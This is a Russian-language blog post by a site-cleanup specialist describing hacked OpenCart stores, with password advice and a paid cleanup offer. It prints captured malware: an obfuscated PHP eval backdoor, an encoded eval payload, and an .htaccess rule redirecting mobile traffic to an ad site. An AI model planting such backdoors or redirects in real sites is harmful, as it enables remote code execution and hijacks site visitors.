В последнее время часто ломают Opencart. Удивляет отношение владельцев. К магазину некоторые ставят пароли вида "12qwe", что разумеется легко брутфорсится. И счастье что 95% взломов осуществляется ботами, которые попросту включают сайт в спам сеть(ну и\или добавляют редирект траффика, рекламу, вирусы, …). Живой хакер, поискал бы способ обокрасть магазин.
Последний случай, классический. Пролезли через админку Опенкарта, закачали шелл, затем накидали обфусцированных файлов, пример ниже. Причем этот же вредоносный код, можно встретить на самых разных платформах. Bitrix, Joomla, WordPress, …
1 |
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n7f2521'];if(isset($s22)){eval($s21($s22));} |
И еще типичный вирус. Это кажется спамбот, хотя неуверен, заниматься деобфускацией лень.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
<?php $v0R3XZI = Array('1'=>'1', '0'=>'s', '3'=>'K', '2'=>'4', '5'=>'7', '4'=>'z', '7'=>'Y', '6'=>'9', '9'=>'l', '8'=>'2', 'A'=>'M', 'C'=>'I', 'B'=>'Z', 'E'=>'F', 'D'=>'R', 'G'=>'D', 'F'=>'f', 'I'=>'O', 'H'=>'q', 'K'=>'P', 'J'=>'m', 'M'=>'W', 'L'=>'V', 'O'=>'h', 'N'=>'y', 'Q'=>'S', 'P'=>'Q', 'S'=>'5', 'R'=>'v', 'U'=>'t', 'T'=>'n', 'W'=>'B', 'V'=>'o', 'Y'=>'i', 'X'=>'w', 'Z'=>'0', 'a'=>'6', 'c'=>'H', 'b'=>'b', 'e'=>'C', 'd'=>'u', 'g'=>'d', 'f'=>'3', 'i'=>'E', 'h'=>'L', 'k'=>'U', 'j'=>'p', 'm'=>'j', 'l'=>'a', 'o'=>'G', 'n'=>'A', 'q'=>'8', 'p'=>'c', 's'=>'k', 'r'=>'T', 'u'=>'g', 't'=>'J', 'w'=>'e', 'v'=>'X', 'y'=>'r', 'x'=>'x', 'z'=>'N'); function vXMMP2A($vZWJYEY, $vFH2IA3){$vQZBQ47 = ''; for($i=0; $i < strlen($vZWJYEY); $i++){$vQZBQ47 .= isset($vFH2IA3[$vZWJYEY[$i]]) ? $vFH2IA3[$vZWJYEY[$i]] : $vZWJYEY[$i];} return base64_decode($vQZBQ47);} $vZKHLCA = 'toE1goOFpoE4pNn6CeC274C4787fz4pxzrB9IMEm7Mi274z9zmkZz4pZIGOJzeC5euVs7860bfCuKQnYC8DJzQC5eYDsBMBOgMxZ'. 's7Qn6CoENpJES3nVuCenuCenuCenuCenYgMSObMkYCGZ+CcWVpE61bJEUBQujhnVuCenuCenuCenuCenYpoOXvfB9pTzj'. 'b82YCGZ+CcWVpcB9pTzjb82V3QX3CenuCenuCenuCenuCTg4b168Bvt4'. 'lM6dCYn6KYWvkZ6FLsLQkZ9KrYX3CenuCenuCenuCenuCTzOBJLUb8D9CYn6KYWnlMSjv8g9geuTp'. '8EJBL6Ub8D9tNs3CenuCenuCenjIXVuCenuCenuCoLmloqup8LNlME0lvj93eDO3r03CenuCcZuBMx4BQW5eYnuCenuCenuBvBOb'. 'eusv1WKk1Dbtfnxt1ZjIXVuCenuFPj6eJ9J3eW9bvWZwQusv1WKk1Dbt8iTvQsu3PVuCenulM7Vlvz4BvP'. 'VtoD9BJE1bcDF7MzZlM6d3QnJtYWJgMSmgo9Rb969wo94gcAVt8Emgo9RbYpu'. 'hYnsBoLJ7vL0gE6O7fDjb82j3PVuCenuCenuCeDFki6rLE0T7QggC'. 'GZutoD9BJE1bcDF7MzZlM6dIXVuCenuBMx4BPVuCenuCenuCeDFki6rLE0T7QggCGZut1z97Z9dBJqTIXjjB'. 'YuuCMLUpcDS3eDFki6rLE0T7Qgg3QnJtYWJgMSmgo9Rb969wo94gcAVt8Emgo9RbYpuhYnsv1WKk1D'. 'bt8iTvQsu3PVuCenu78E0bE61p8LNv8B1bJAVt8Emgo9RbYpuhYnsv1WKk1Dbt8iTvQs5eJL2lvP5'; eval(vXMMP2A($vZKHLCA, $v0R3XZI));?> |
Не обошлось и без .htaccess с редиректом мобильного траффика.
1 2 3 4 5 6 7 8 9 10 11 |
RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] ... RewriteRule ^(.*)$ http://somefuckingadvsite.com/index.php?t=6 [R=301,L] |
Стандартный для Opencart набор вирусов. Лечить несложно, сложнее закрыть все уязвимости.
Ну и конечно удивляет отношение разработчиков. OpenCart <= 1.5.6.4 (cart.php) PHP Object Injection Vulnerability.
Баг известен давно, в конце мая о нем уже знали разработчики и обещали выпустить 1.5.6.5 закрыв эту уязвимость. Но воз и ныне там, последняя версия Opencart 1.5.6.4 выпущена в апреле(разработчики полноценно обновляют лишь ветку2.0), приходится закрывать патчем.
Позабавила и поддержка одного хостера. После взлома антивирус хостера, заблокировал некоторые папки выставив права "000" и поменяв владельца. И после запроса с просьбой вернуть нормальные права к одной из папок, для дальнейшего лечения вирусов, я получил такой ответ:
Права доступа к /home/******/public_html/catalog/view/theme/default/template/error
заданы настройками Prestashop, и служат для хранения внутренних ошибок CMS.
Prestashop сам создает и назначает такие права.
На работе сайта она ни как не задействована.
Какой престашоп, если у меня опенкарт? И зачем Престашопу менять права если в работе папка не задействована? 🙂
В итоге хостер таки права поменял, но осадочек то…
Не верьте службе поддержки!
И напоследочек, хоть и знаю что бесполезно. Уважаемые владельцы! Пароли вида "123werty", "123mom","ab89287662901","petya19700401" легко брутфорсятся. Даты, имена, русские слова со сменой раскладки, и т.п. использовать в паролях нельзя. Пароль к админке, а особенно к админке магазина должен иметь не менее 8 символов, а лучше больше, быть бессмысленным, с чередованием букв и цифр. В идеале лучше создать новый админ аккаунт с другим логином и удалить дефолтный аккаунт "admin". Даже эта мера отобьет процентов 70% брутфорс атак.
И да, если вас все таки заразили и у вас не получается или нет времени справиться самостоятельно, обращайтесь ко мне. Вылечу от вирусов ваш сайт. Расценки скромные 800 р. 6 месяцев гарантии на мою работу.
Контакты
Свежие комментарии